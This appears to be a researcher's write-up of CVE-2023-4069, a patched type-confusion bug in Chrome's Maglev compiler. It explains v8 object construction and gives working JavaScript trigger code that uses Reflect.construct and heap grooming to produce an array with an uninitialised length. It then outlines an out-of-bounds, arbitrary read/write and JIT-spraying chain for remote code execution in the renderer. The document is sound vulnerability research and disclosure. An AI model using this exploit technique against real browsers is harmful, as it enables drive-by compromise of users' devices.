Getting RCE in Chrome with incomplete object initialization in the Maglev compiler
In this post I’ll exploit CVE-2023-4069, a type confusion vulnerability that I reported in July 2023. The vulnerability—which allows remote code execution (RCE) in the renderer sandbox of Chrome by a single visit to a malicious site—is found in v8, the Javascript engine of Chrome. It was filed as bug 1465326 and subsequently fixed in version 115.0.5790.170/.171.
Vulnerabilities like this are often the starting point for a “one-click” exploit, which compromises the victim’s device when they visit a malicious website. A renderer RCE in Chrome allows an attacker to compromise and execute arbitrary code in the Chrome renderer process. However, the renderer process has limited privileges, so such a vulnerability needs to be chained with a second “sandbox escape” vulnerability (either another vulnerability in the Chrome browser process or one in the operating system) to compromise Chrome itself or the device.
While many of the most powerful and sophisticated “one-click” attacks are highly targeted, and average users may be more at risk from less sophisticated attacks such as phishing, users should still keep Chrome up-to-date and enable automatic updates, as vulnerabilities in v8 can often be exploited relatively quickly.
The current vulnerability, CVE-2023-4069, exists in the Maglev compiler, a new mid-tier JIT compiler in Chrome that optimizes Javascript functions based on previous knowledge of the input types. This kind of optimization is called speculative optimization and care must be taken to make sure that these assumptions on the inputs are still valid when the optimized code is used. The complexity of the JIT engine has led to many security issues in the past and has been a popular target for attackers.
Maglev compiler
The Maglev compiler is a mid-tier JIT compiler used by v8. Compared to the top-tier JIT compiler, TurboFan, Maglev generates less optimized code but compiles much faster. Having multiple JIT compilers is common in Javascript engines; the idea is that multiple compiler tiers offer a better tradeoff between compilation time and runtime performance.
Generally speaking, when a function is first run, bytecode is generated for it, which is slow to execute. As the function is run more often, it may get compiled into more optimized code, first by the lowest-tier JIT compiler. If the function gets used more often still, its optimization tier moves up, resulting in better runtime performance at the expense of a longer compilation time. The idea here is that for code that runs often, the runtime cost will likely outweigh the compile-time cost. You can consult An Introduction to Speculative Optimization in v8 by Benedikt Meurer for more details of how the compilation process works.
The Maglev compiler is enabled by default starting from version 114 of Chrome. Similar to TurboFan, it goes through the bytecode of a Javascript function, taking into account the feedback collected from previous runs, and transforms the bytecode into more optimized code. However, unlike TurboFan, which transforms bytecode into a “Sea of Nodes”, Maglev uses its own intermediate representation and transforms bytecode into SSA (static single-assignment) nodes, which are declared in the file maglev-ir.h. At the time of writing, the compilation process of Maglev consists mainly of two optimization phases: the first phase builds a graph from the SSA nodes, while the second optimizes the representations of Phi values.
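To get a feel for when Maglev kicks in, the following d8 snippet sketches how a function can be warmed up and optimized. The %PrepareFunctionForOptimization and %OptimizeMaglevOnNextCall intrinsics are test-only helpers that I'm assuming are available when d8 is run with --allow-natives-syntax --maglev; they are not stable APIs.
function add(a, b) { return a + b; }
%PrepareFunctionForOptimization(add);
add(1, 2);                 // collect type feedback: both inputs are small integers
%OptimizeMaglevOnNextCall(add);
add(3, 4);                 // now runs Maglev code specialized for small-integer inputs
add(1.5, 2.5);             // violates the speculated input types and triggers a deoptimization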
Object construction in v8
The bug in this post really has more to do with object construction than with Maglev, so now I’ll go through some concepts of how v8 handles object construction in Javascript. A Javascript function can be used as a constructor and called with the new keyword. When it is called with new, the new.target variable exists in the function scope and specifies the function that was called with new. In the following case, new.target is the same as the function itself:
function foo() {
%DebugPrint(new.target);
}
new foo(); // foo
foo(); // undefined
This, however, is not always the case, and new.target may be different from the function itself. For example, in the case of a construction via a derived constructor:
class A {
constructor() {
%DebugPrint(new.target);
}
}
class B extends A {
}
new A(); // A
new B(); // B
Another way to have a different new.target is to use the Reflect.construct built-in function:
Reflect.construct(A, [], B); // B
The signature of Reflect.construct is as follows, which specifies newTarget as the new.target:
Reflect.construct(target, argumentsList, newTarget)
The Reflect.construct method sheds some light on the role of new.target in object construction. According to the documentation, target is the constructor that is actually executed to create and initialize an object, while newTarget provides the prototype for the created object. For example, the following creates a Function type object and only Function is called:
var x = Reflect.construct(Function, [], Array);
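A quick way to see both roles at once (this should work in any modern Javascript engine, not just d8):
var x = Reflect.construct(Function, [], Array);
console.log(typeof x);                                     // "function": Function (the target) was executed
console.log(Object.getPrototypeOf(x) === Array.prototype); // true: the prototype comes from Array (the newTarget)
console.log(Array.isArray(x));                             // false: Array itself was never called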
This is consistent with construction via class inheritance:
class A {}
class B extends A {}
var x = new B();
console.log(x.__proto__ == B.prototype); //<--- true
In this case, though, the derived constructor B does get called. So what is the object that’s actually created? For functions that actually return a value, or for class constructors, the answer is clearer:
function foo() {return [1,2];}
function bar() {}
var x = Reflect.construct(foo, [], bar); //<--- returns [1,2]
but less so otherwise:
function foo() {}
function bar() {}
var x = Reflect.construct(foo, [], bar); //<--- returns object {}, instead of undefined
So even if a function does not return an object, using it as target in Reflect.construct still creates a Javascript object. Roughly speaking, object construction follows these steps (see, for example, Generate_JSConstructStubGeneric):
First, a default receiver (the this object) is created using FastNewObject, and then the target function is invoked. If the target function returns an object, then the default receiver is discarded and the return value of target is used as the returned object instead; otherwise, the default receiver is returned.
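The following is a simplified, self-contained Javascript model of these steps. It is only an approximation of what Generate_JSConstructStubGeneric does: it ignores the initial_map machinery discussed below and uses an ordinary prototype lookup for the receiver.
function constructModel(target, args, newTarget) {
  // 1. Create the default receiver; its prototype comes from newTarget.
  var receiver = Object.create(newTarget.prototype);
  // 2. Invoke the target function with the default receiver as `this`.
  var result = target.apply(receiver, args);
  // 3. If target returned an object, it replaces the default receiver.
  return (typeof result === "object" && result !== null) ? result : receiver;
}
function foo() { return [1, 2]; }
function bar() {}
console.log(constructModel(foo, [], bar)); // returns [1, 2]: the returned object wins
console.log(constructModel(bar, [], bar)); // returns the default receiver (an empty object)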
Default receiver object
The default receiver object created by FastNewObject is relevant to this bug, so I’ll explain it in a bit more detail. Most Javascript functions contain an internal field, initial_map. This is a Map object that determines the type and the memory layout of the default receiver object created by this function. In v8, Map determines the hidden type of an object, in particular, its memory layout and the storage of its fields. Readers can consult “JavaScript engine fundamentals: Shapes and Inline Caches” by Mathias Bynens to get a high-level understanding of object types and maps.
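In d8 (run with --allow-natives-syntax), the %HaveSameMap test intrinsic can be used to observe maps being shared and transitioned; treat this as an illustrative sketch, since these intrinsics are debugging helpers rather than stable APIs.
const p1 = {x: 1, y: 2};
const p2 = {x: 3, y: 4};
console.log(%HaveSameMap(p1, p2)); // true: same shape, so both objects share a hidden Map
p2.z = 5;
console.log(%HaveSameMap(p1, p2)); // false: adding a property transitions p2 to a new Map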
When creating the default receiver object, FastNewObject will try to use the initial_map of new.target (new_target) as the Map for the default receiver:
TNode<JSObject> ConstructorBuiltinsAssembler::FastNewObject(
    TNode<Context> context, TNode<JSFunction> target,
    TNode<JSReceiver> new_target, Label* call_runtime) {
  // Verify that the new target is a JSFunction.
  Label end(this);
  TNode<JSFunction> new_target_func =
      HeapObjectToJSFunctionWithPrototypeSlot(new_target, call_runtime);
  ...
  GotoIf(DoesntHaveInstanceType(CAST(initial_map_or_proto), MAP_TYPE),
         call_runtime);
  TNode<Map> initial_map = CAST(initial_map_or_proto);
  TNode<Object> new_target_constructor = LoadObjectField(
      initial_map, Map::kConstructorOrBackPointerOrNativeContextOffset);
  GotoIf(TaggedNotEqual(target, new_target_constructor), call_runtime); //<--- check
  ...
This is curious, as the default receiver should have been created using target, and new_target should only be used to set its prototype. The reason is an optimization that caches both the initial_map of target and the prototype of new_target in the initial_map of new_target, which I’ll explain now.
In the above, FastNewObject has a check (marked as “check” in the above snippet) that makes sure that target is the same as the constructor field of the initial_map. For most functions, the initial_map is created lazily, or its constructor field points to the function itself (new_target in this case). So when new_target is first used to construct an object with a different target, the call_runtime slow path is likely taken, which uses JSObject::New:
MaybeHandle<JSObject> JSObject::New(Handle<JSFunction> constructor,
                                    Handle<JSReceiver> new_target,
                                    Handle<AllocationSite> site) {
  ...
  Handle<Map> initial_map;
  ASSIGN_RETURN_ON_EXCEPTION(
      isolate, initial_map,
      JSFunction::GetDerivedMap(isolate, constructor, new_target), JSObject);
  ...
This function calls GetDerivedMap, which may call FastInitializeDerivedMap to create an initial_map in the new_target:
bool FastInitializeDerivedMap(Isolate* isolate, Handle<JSFunction> new_target,
                              Handle<JSFunction> constructor,
                              Handle<Map> constructor_initial_map) {
  ...
The initial_map created here is a copy of the initial_map of target (constructor), but with its prototype set to the prototype of new_target and its constructor set to target. This is the only case in which the constructor of an initial_map points to a function other than itself, and it provides the context for the initial_map of new_target to be used in FastNewObject: if the constructor of an initial_map points to a different function, then the initial_map is a copy of the initial_map of that constructor. By checking that new_target.initial_map.constructor equals target, FastNewObject ensures that the initial_map of new_target is a copy of target.initial_map, but with new_target.prototype as its prototype, which is the correct Map to use.
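To summarize the caching logic, here is a small, self-contained Javascript model of the fast/slow path decision. The initialMapModel and constructorModel fields are stand-ins for v8's internal initial_map and constructor fields, which are not accessible from Javascript; this is a sketch of the behavior described above, not the real implementation.
function fastNewObjectModel(target, newTarget) {
  var map = newTarget.initialMapModel;              // stand-in for new_target.initial_map
  if (map === undefined || map.constructorModel !== target) {
    // Slow path (call_runtime / JSObject::New): GetDerivedMap creates a derived map,
    // a copy of target's initial map with newTarget.prototype as its prototype, and caches it.
    map = { constructorModel: target, prototypeModel: newTarget.prototype };
    newTarget.initialMapModel = map;
  }
  // Fast path on later constructions: the cached map already matches target,
  // so it can be used directly to allocate the receiver.
  return Object.create(map.prototypeModel);
}
var obj = fastNewObjectModel(function B() {}, Array);
console.log(Object.getPrototypeOf(obj) === Array.prototype); // true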
The vulnerability
Derived classes often have no-op default constructors, which do not modify receiver objects, for example:
class A {}
class B extends A {}
class C extends B {}
const o = new C();
In this case, when calling new C(), the default constructor calls to B and A are no-ops and can be omitted. The FindNonDefaultConstructorOrConstruct bytecode is an optimization that omits redundant calls to no-op default constructors in these cases. In essence, it walks up the chain of super constructors and skips the default constructors that can be omitted. If it can skip all the intermediate default constructors and reach the base constructor, then FastNewObject is called to create the default receiver object. The bytecode is introduced in a derived class constructor:
class A {}
class B extends A {}
new B();
Running the above with the --print-bytecode flag in d8 (the standalone version of v8), I can see that FindNonDefaultConstructorOrConstruct is inserted in the bytecode of the derived constructor B:
[generated bytecode for function: B (0x1a820019ba41 <SharedFunctionInfo B>)]
Bytecode length: 45
Parameter count 1
Register count 7
Frame size 56
         0x1a820019be6c @  0 : 19 fe f9       Mov <closure>, r1
1700 S>  0x1a820019be6f @  3 : 5a f9 fa f5    FindNonDefaultConstructorOrConstruct r1, r0, r5-r6
         ...
         0x1a820019be7e @ 18 : 99 0c          JumpIfTrue [12] (0x1a820019be8a @ 30)
         ...
         0x1a820019be8a @ 30 : 0b 02          Ldar <this>
         0x1a820019be8c @ 32 : ad             ThrowSuperAlreadyCalledIfNotHole
         0x1a820019be8d @ 33 : 19 f7 02       Mov r3, <this>
1713 S>  0x1a820019be90 @ 36 : 0d 01          LdaSmi [1]
1720 E>  0x1a820019be92 @ 38 : 32 02 00 02    SetNamedProperty <this>, [0], [2]
         0x1a820019be96 @ 42 : 0b 02          Ldar <this>
1727 S>  0x1a820019be98 @ 44 : aa             Return
In particular, if FindNonDefaultConstructorOrConstruct succeeds (returns true), then the default receiver object will be returned immediately.
The vulnerability happens in the handling of FindNonDefaultConstructorOrConstruct in Maglev:
void MaglevGraphBuilder::VisitFindNonDefaultConstructorOrConstruct() {
...
compiler::OptionalHeapObjectRef new_target_function =
TryGetConstant(new_target);
if (kind == FunctionKind::kDefaultBaseConstructor) {
ValueNode* object;
if (new_target_function && new_target_function->IsJSFunction()) {
object = BuildAllocateFastObject(
FastObject(new_target_function->AsJSFunction(), zone(),
broker()),
AllocationType::kYoung);
...
If it manages to skip all the default constructors and reach the base constructor, then it’ll check whether new_target is a constant. If that is the case, then BuildAllocateFastObject, instead of FastNewObject, is used to create the receiver object. The problem is that, unlike FastNewObject, BuildAllocateFastObject uses the initial_map of new_target without checking its constructor field:
ValueNode* MaglevGraphBuilder::BuildAllocateFastObject(
FastObject object, AllocationType allocation_type) {
...
ValueNode* allocation = ExtendOrReallocateCurrentRawAllocation(
object.instance_size, allocation_type);
BuildStoreReceiverMap(allocation, object.map); // new_target.initial_map
...
return allocation;
}
Why is this bad? As explained before, when constructing an object, target, rather than new_target, is called to initialize the object fields. If new_target is not of the same type as target, then creating an object with the initial_map of new_target can leave fields uninitialized:
class A {}
class B extends A {}
var x = Reflect.construct(B, [], Array);
In this case, new_target is Array, so if the initial_map of new_target is used to create x (the receiver), then x is going to be an Array type object, which has a length field that specifies the size of the array and is used for bounds checking. If B, which is the target, is used to initialize the Array object, then length would remain uninitialized. This problematic scenario is prevented by checking that the constructor of new_target.initial_map is B, and the absence of this check in Maglev results in the vulnerability.
There is one problem here: I need new_target to be a constant to reach this code, but when used with Reflect.construct, new_target is an argument to the function and is never going to be a constant. To overcome this, let’s take a look at what TryGetConstant, which is used in FindNonDefaultConstructorOrConstruct to check that new_target is a constant, does:
compiler::OptionalHeapObjectRef MaglevGraphBuilder::TryGetConstant(
    ValueNode* node, ValueNode** constant_node) {
  if (auto result = TryGetConstant(broker(), local_isolate(), node)) { //<--- 1.
    if (constant_node) *constant_node = node;
    return result;
  }
  const NodeInfo* info = known_node_aspects().TryGetInfoFor(node);
  if (info && info->is_constant()) { //<--- 2.
    if (constant_node) *constant_node = info->constant_alternative;
    return TryGetConstant(info->constant_alternative);
  }
  return {};
}
When checking whether a node is a constant, TryGetConstant first checks if the node is a known global constant (marked as 1. in the above), which will be false in our case. However, it also checks the NodeInfo of the node to see if it has been marked as a constant by other nodes (marked as 2. in the above). If the value of the node has previously been checked against a global constant, then its NodeInfo will be set to a constant. So I can store new.target to a global variable whose value has not changed, which causes Maglev to insert a CheckValue node to ensure that new.target is the same as the global constant:
class A {}
var x = Array;
class B extends A {
constructor() {
x = new.target; //<--- insert CheckValue node to cache new.target as constant (Array)
super();
}
}
Reflect.construct(B, [], Array); //<--- Calls `B` as `target` and `Array` as `new_target`
When B is optimized by Maglev and the optimized code is run, Reflect.construct is likely to return an Array with length 0. This is because, initially, the free space in the heap mostly contains zeroes, so when the created Array uses an uninitialized value as its length, this value is most likely going to be zero. However, once a garbage collection is run, the free space in the heap will likely contain some non-trivial values (objects that were freed by garbage collection). By creating some objects in the heap, deleting them, and then triggering a garbage collection, I could carefully arrange the heap to make the uninitialized Array created through the bug take any value as its length. In practice, a rather crude trial-and-error approach (which mostly involves triggering a garbage collection and creating uninitialized Arrays with the bug until you get it right) is sufficient to give me consistent and reliable results:
//----- Create incorrect Maglev code ------
class A {}
var x = Array;
class B extends A {
constructor() {
x = new.target;
super();
}
}
function construct() {
var r = Reflect.construct(B, [], x);
return r;
}
//Compile optimize code
for (let i = 0; i < 2000; i++) construct();
//-----------------------------------------
//Trigger garbage collection to fill the free space of the heap
//(gcSize is a large allocation size defined elsewhere in the exploit)
new ArrayBuffer(gcSize);
new ArrayBuffer(gcSize);
corruptedArr = construct(); // length of corruptedArr is 0, try again...
corruptedArr = construct(); // length of corruptedArr takes the pointer of an object, which gives a large value
While this already allows out-of-bounds (OOB) access to a Javascript array, which is often sufficient to gain code execution, the situation is slightly more complicated in this case.
Gaining code execution
The Array created via the bug has no elements, so its element store is set to the empty_fixed_array. The main problem is that empty_fixed_array is located in a read-only region of the v8 heap, which means that an OOB write needs to use an offset large enough to go past the entire read-only heap or it’ll just crash on access:
DebugPrint: 0x10560004d5e5: [JSArray]
- map: 0x10560018ed39 [FastProperties]
- prototype: 0x10560018e799
- elements: 0x105600000219 [HOLEY_SMI_ELEMENTS] //<------- address of empty_fixed_array
...
As you can see above, the lower 32 bits of the address of empty_fixed_array are 0x219, which is fairly small. The lower 32 bits of the address are called the compressed address. In v8, most references are stored as only the lower 32 bits of the full 64-bit pointers in the heap, while the higher 32 bits remain constant and are cached in a register. In particular, v8 objects are referenced using the compressed address; this optimization is called pointer compression.
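As a consequence, an out-of-bounds read from a double array returns a raw 8-byte value that typically contains two such compressed 32-bit words side by side. A small helper of the kind commonly used in v8 exploits (a sketch for illustration, not part of the original exploit) makes this easier to see:
function doubleToWords(d) {
  var buf = new ArrayBuffer(8);
  new Float64Array(buf)[0] = d;
  var words = new Uint32Array(buf);
  // words[0]/words[1] are the low and high 32 bits; each is typically either a
  // compressed pointer or a SMI (a small integer shifted left by one bit).
  return {lo: words[0], hi: words[1]};
}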
As explained in Section “Bypassing the need to get an infoleak” of my other post, the addresses of many objects are very much constant in v8 and depend only on the software version. In particular, the address of empty_fixed_array is the same across different runs and software versions, and more importantly, it remains a small address. This means most v8 objects are going to be placed at an address larger than that of the empty_fixed_array. In particular, with a large enough length, it is possible to access any v8 object.
While, in theory at least, this bug can be exploited, it is still unclear how I can use it to access and modify a specific object of my choice. Although I can use the uninitialized Array created by the bug to search through all objects that are allocated behind empty_fixed_array, doing so is inefficient and I may end up accessing some invalid objects that could result in a crash. It would be good if I could at least have an idea of the addresses of the objects that I create in Javascript.
In a talk that I gave at the POC2022 conference last year, I shared how object addresses in v8 can indeed be predicted accurately by simply knowing the version of Chrome. What I didn’t know then was that, even after a garbage collection, object addresses can still be predicted reliably.
//Triggers garbage collection
new ArrayBuffer(gcSize);
new ArrayBuffer(gcSize);
corruptedArr = construct();
corruptedArr = construct();
var oobDblArr = [0x41, 0x42, 0x51, 0x52, 1.5]; //<---- address remains consistent across runs
For example, in the above situation, the object oobDblArr created after garbage collection remains at the same address fairly consistently across different runs. While the address can sometimes change slightly, it gives me a rough starting point to search for oobDblArr in corruptedArr (the Array created from the bug). With this, I can corrupt the length of oobDblArr to gain OOB access with oobDblArr. The exploit flow is now very similar to the one described in my previous post, and consists of the following steps:
- Place an Object Array, oobObjArr, after oobDblArr, and use the OOB read primitive to read the addresses of the objects stored in this array. This allows me to obtain the address of any v8 object.
- Place another double array, oobDblArr2, after oobDblArr, and use the OOB write primitive in oobDblArr to overwrite the element field of oobDblArr2 with an object address. Accessing the elements of oobDblArr2 then allows me to read/write to arbitrary addresses.
- While this gives me arbitrary read and write primitives within the v8 heap and also the address of any object, the recently introduced heap sandbox in v8 keeps the v8 heap fairly isolated, so I still can’t access arbitrary memory within the renderer process. In particular, I can no longer use the standard method of overwriting the RWX pages that are used for storing WebAssembly code to achieve code execution. Instead, JIT spraying can be used to bypass the heap sandbox.
- The idea of JIT spraying is that a pointer to the JIT-optimized code of a function is stored in a Javascript Function object. By modifying this pointer using the arbitrary read and write primitives within the v8 heap, I can make this pointer jump to the middle of the JIT code. If I use data structures, such as a double array, to store shellcode as floating point numbers in the JIT code, then jumping into these data structures allows me to execute arbitrary code. I refer readers to this post for more details; a minimal sketch of the spraying step follows below.
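A minimal sketch of the spraying step, assuming the real exploit replaces the placeholder constants with doubles that encode short instruction sequences chained together by small relative jumps:
function jitSprayTarget() {
  // The constants below are placeholders, not working shellcode; in a real exploit,
  // each double encodes a few bytes of machine code followed by a short jump.
  return [1.1, 2.2, 3.3, 4.4];
}
// Warm the function up so the optimizing JIT embeds the constants in executable memory.
for (let i = 0; i < 100000; i++) jitSprayTarget();
// With the arbitrary read/write primitives, the code pointer in the Function object is
// then redirected into the middle of the embedded constants.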
The exploit can be found here with some setup notes.
Conclusion
With different tiers of optimization in Chrome, the same functionality often needs to be implemented multiple times, each with different and specific optimization considerations. For complex routines that rely on subtle assumptions, this can result in security problems when porting code between different optimization tiers, as we have seen in this case, where the implementation of FindNonDefaultConstructorOrConstruct missed an important check.